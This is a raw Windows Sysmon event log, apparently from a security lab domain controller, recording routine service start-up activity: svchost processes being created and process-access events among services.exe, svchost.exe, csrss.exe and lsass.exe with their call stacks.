13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0A00-00000000A301}8481108C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.525{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{59A5CD1D-8E46-6005-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.510{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{59A5CD1D-8E46-6005-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 